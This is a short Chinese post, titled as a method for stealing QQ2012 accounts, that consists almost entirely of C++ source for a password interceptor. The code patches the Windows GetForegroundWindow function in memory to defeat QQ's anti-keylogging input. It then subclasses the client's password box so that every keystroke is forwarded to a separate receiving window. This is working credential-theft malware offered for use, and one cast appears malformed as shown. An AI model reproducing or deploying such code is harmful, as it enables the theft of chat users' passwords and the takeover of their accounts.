QQ2012客户端盗号，截取密码

/*
 * 修改GetForegroundWindow函数，使得QQ进程不能得知自己成为前台窗口，这样就不会发送干扰输入了；同时修改密码窗口的窗口过程，以便监听
*/

BOOL CalePatchAddr()
{
	FARPROC FuncAddr = GetProcAddress(GetModuleHandle(_T("USER32.DLL")), "GetForegroundWindow");
	byte HookCode[] = {0xC3/*ret*/, 0x90/*nop*/, 0x90, 0x90, 0x90};

	LPVOID CodeAddr = VirtualAlloc(0, 5, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
	memcpy(CodeAddr, HookCode, 5);

	ULONG oData;
	VirtualProtect(FuncAddr, 5, PAGE_EXECUTE_READWRITE, &oData);
	byte NewCode[] = { 0xE9 /*jmp*/, 0, 0, 0, 0 };
	DWORD off = (DWORD)CodeAddr - (DWORD)FuncAddr - 5;

	memcpy(&NewCode[1], &off, 4);
	memcpy(FuncAddr, NewCode, 5);

	return TRUE;
}

WNDPROC pswd_proc = NULL;
HWND recv_hwnd = NULL;

//监听窗口过程
LRESULT CALLBACK WndProc2(HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam)
{
	SendMessage((HWND)recv_hwnd, message, wParam, lParam);

//监听密码后，传送给原窗口过程。
	return ::CallWindowProc(pswd_proc, hWnd, message, wParam, lParam);
}
void InstallHook()
{
	HWND QQ_hwnd = ::FindWindow(_T("TXGuiFoundation"), _T("QQ2012"));
	if (QQ_hwnd == NULL)
	{
		AfxMessageBox(_T("QQ not found!"));
		return;
	}

	HWND pswd_hwnd = FindWindowEx(QQ_hwnd, 0, _T("Edit"), 0);	//: MsgBox hwnd_qq_psw
	if (pswd_hwnd == NULL)
	{
		AfxMessageBox(_T("pswd HWND not found!"));
		return;
	}
	// 修改密码框窗口过程，监听输入
	pswd_proc = reinterpret_cast(GetWindowLong(pswd_hwnd, GWL_WNDPROC));


	long ret = SetWindowLong(pswd_hwnd, GWL_WNDPROC, (long)WndProc2);
}